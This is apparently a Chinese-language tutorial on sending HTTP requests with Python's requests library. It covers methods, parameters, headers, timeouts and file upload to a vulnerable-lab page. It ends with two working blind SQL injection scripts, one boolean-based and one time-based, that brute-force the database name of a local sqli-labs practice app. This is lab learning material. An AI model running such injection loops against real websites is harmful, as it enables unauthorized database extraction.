python发送http请求

py发送http请求

　　import requests

  requests模块模块中的http方法

    r=requests.get()

    r=requests.post()

    r=requests.put()

    r=requests.delete()

    r=requests.head()

    r=requests.options()

  参数:

    GET参数      params

    HTTP头部      headers

    POST参数      datas

    文件        files

    Cookies       cookies

    重定向处理     allow_redirects=False/True

    超时        timeout

    证书验证      verify=False/True

    工作流       stream=False/True

    事件挂钩      hooks=dict(response=)

    身份验证      auth=

    代理        proxies=

  对象方法：

    URL        .url

    text        .text

    编码        .encoding  |  .encoding=

    相应内容      .content

    Json解码器       .json

    原始套接字响应   .raw | .raw.read()   （需要开启stream=True）

    历史响应代码    .history

    抛出异常      .raise_for_status()

    查看服务器响应头  .headers

    查看客户端响应头  .request.headers

    查看cookie     .cookies

    身份验证      .auth=

    更新        .update

    解析连接字头    .links()

 

  用python发送request请求

import requests

r = requests.get('http://localhost/pytest/get.php') #get方法发送请求，结果保存在r中
print(r.text)   #查看正文内容
print(r.status_code)    #查看响应状态码
print(r.encoding)   #查看编码
print(r.headers)    #查看响应头

  定制头部

import requests

url = "http://localhost/pytest/get.php"
header = {"User-Agent":"dgut"}
r = requests.get(url=url,headers=header)
print(r.request.headers)

  定义超时时间

import requests

url="http://localhost/pytest/timeout.php"

try:
    r=requests.get(url=url,timeout=3)    #超过3s没有回应就当作超时
    print(r.text)

except Exception as e:
    print("timeout")

  给get方法传参

import requests

url = "http://localhost/pytest/get.php"
params = {"name": "test","pwd": "test"}
r = requests.get(url=url,params=params)
print(r.text)

  给post方法传参

import requests

url = "http://localhost/pytest/post.php"
data = {"username": "test1","pwd": "empty"}

r = requests.post(url=url,data=data)
print(r.text)

  上传文件

import requests

url = "http://localhost/pikachu/vul/unsafeupload/clientcheck.php"
upFile = {"uploadfile": open("title.png", "rb")}    #uploadfile对应上传文件类的name
post = {"submit": "submit"}    #对应提交按钮的type和name
r = requests.post(url=url, files=upFile, data=post)
print(r.text)

  通过py进行布尔盲注爆数据库名（sqli的less8）

import requests
import string

url = "http://127.0.0.1/sqli/Less-8/"

webLen = len(requests.get(url=url+"?id=1").text)  #正常的页面长度
print("Len of html is:"+str(webLen))

dbNameLen = 0
while 1:
    tUrl = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"    #探测数据库长度
    print(tUrl)

    if len(requests.get(tUrl).text) == webLen:   #当页面长度与正常页面长度相同时判断为正确的数据库长度
        print(dbNameLen)
        break
    if dbNameLen > 30:
        print("error")
        break
    dbNameLen += 1


dbName = ""
for i in range(1, dbNameLen+1):
    for a in string.ascii_letters:
        dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"      #穷举数据库名字
        print(dbName_url)
        if len(requests.get(dbName_url).text) == webLen:

            dbName += a
            break

print(dbName)

  基于时间的盲注（sqli less9）

import requests
import string

url = "http://127.0.0.1/sqli/Less-9/?id=1"

# 判断数据库名长度
a = 0
while 1:
    dbLenUrl = url + "' and if(length(database())=" + str(a) + ",sleep(6),sleep(0))" + "--+"
    try:
        r = requests.get(url=dbLenUrl, timeout=2)
        a += 1
    except Exception as e:
        print("len is " + str(a))
        break

# 判断数据库名
dbName = ""
for i in range(1, a + 1):
    for each in string.ascii_letters:
        # if(substr(database(),i,1)='each',sleep(6),sleep(0))
        dbNameUrl = url + "' and if(substr(database()," + str(i) + ",1)='" + each + "',sleep(6),sleep(0))" + "--+"
        try:
            res = requests.get(url=dbNameUrl, timeout=2)
            continue
        except Exception as e:
            dbName = dbName + each
            print(dbName)
            break

print("databaseName is " + dbName)